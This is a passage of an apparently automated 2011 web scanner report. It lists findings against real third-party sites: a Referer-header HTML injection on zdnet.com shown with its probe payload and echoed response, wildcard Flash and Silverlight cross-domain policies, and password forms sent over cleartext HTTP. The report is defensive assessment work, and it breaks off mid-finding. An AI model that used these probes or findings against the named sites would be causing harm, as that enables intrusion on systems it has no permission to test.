Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e14"><a>7f6f3d790ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: a2e14"><a>7f6f3d790ed

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:11:56 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:11:56 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 119975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
log.com.com/adlog/e/r=18117&amp;sg=478730&amp;o=10%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2000&amp;nd=10&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e2:4D2CD2ED74559F&amp;orh=a2e14"><a>7f6f3d790ed&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=a2e14">
...[SNIP]...

4. Flash cross-domain policy
There are 9 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.crwdcntrl.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 09 Jun 2009 18:20:38 GMT
ETag: "2e70196-a5-46bee6a616980"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control    permitted-cross-domain-policies="master-only" />
   <allow-access-from    domain="*" />
</cross-domain-policy>

4.2. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Wed, 12 Jan 2011 03:00:27 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://ad.uk.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 17:22:35 GMT
Date: Wed, 12 Jan 2011 03:00:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.4. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Thu, 13 Jan 2011 03:00:25 GMT
Date: Wed, 12 Jan 2011 03:00:25 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.5. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


4.6. http://ad.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:00:27 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "906968-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.7. http://adlog.com.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adlog.com.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adlog.com.com

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:27 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 6975
Keep-Alive: timeout=15, max=790
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...

4.8. http://www.walmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT
ETag: "11b9b-137-46ca84217bc80"
Cache-Control: max-age=7200
Expires: Wed, 12 Jan 2011 17:26:34 GMT
Content-Type: application/xml
Date: Wed, 12 Jan 2011 15:26:34 GMT
Content-Length: 311
Connection: close
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907974245525d5f4f58455e445a4a423660;path=/
Set-Cookie: dcenv=edc; path=/; domain=walmart.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.walmart.com" />
<allow-access-from domain="*.richfx.com" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...

4.9. http://www.washingtonpost.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.1 200 OK
Server: Web Server
Date: Wed, 12 Jan 2011 15:26:41 GMT
Cache-control: max-age=60
Expires: Wed, 12 Jan 2011 15:27:41 GMT
Content-type: text/xml
Last-modified: Thu, 08 Apr 2010 15:51:21 GMT
Content-length: 478
Etag: "1de-4bbdfb79"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com" />
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com" />
...[SNIP]...

5. Silverlight cross-domain policy
There are 3 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Wed, 12 Jan 2011 03:00:27 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 14:50:55 GMT
Date: Wed, 12 Jan 2011 03:00:28 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Thu, 13 Jan 2011 03:00:25 GMT
Date: Wed, 12 Jan 2011 03:00:25 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6. Cleartext submission of password
There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://account.theregister.co.uk/register/

Summary

Severity:   High
Confidence:   Certain
Host:   http://account.theregister.co.uk
Path:   /register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /register/ HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:12:21 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 30609

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h2>


<form action="http://account.theregister.co.uk/register/" method="post" id="acc-edit">
<input type="hidden" name="product" value="theregister_newsletter">
...[SNIP]...
<td><input type="password" name="password" value="" size="30"></td>
...[SNIP]...
<td><input type="password" name="confirm_password" value="" size="30"></td>
...[SNIP]...

6.2. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.3. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.theregister.co.uk
Path:   /forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</div>


<form method=POST action="http://forums.theregister.co.uk/post/submit/2011/01/07/open_source_crypto_curbs/" class=box id=comment-form name=comment-form>

<h3>
...[SNIP]...
<div><input name=password type=password></div>
...[SNIP]...

6.4. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.theregister.co.uk
Path:   /forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</p>
<form method=POST action="http://account.theregister.co.uk/login/">
<input type=hidden name=r value="http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/">
...[SNIP]...
</span>
<input class=text type=password name=password></label>
...[SNIP]...

6.5. http://lists.arin.net/mailman/listinfo/arin-whoisrws

Summary

Severity:   High
Confidence:   Certain
Host:   http://lists.arin.net
Path:   /mailman/listinfo/arin-whoisrws

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /mailman/listinfo/arin-whoisrws HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:59 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 12065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- $Revision: 2.4 $ -->
<!--
...[SNIP]...
<fieldset class="standard">
<FORM Method=POST ACTION="../subscribe/arin-whoisrws">

<h3 class="mail_h3">
...[SNIP]...
</label>
<INPUT type="Password" name="pw" size="15"></li>
...[SNIP]...
</label>
<INPUT type="Password" name="pw-conf" size="15"></li>
...[SNIP]...

6.6. http://whitepapers.theregister.co.uk/

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.theregister.co.uk
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:34 GMT
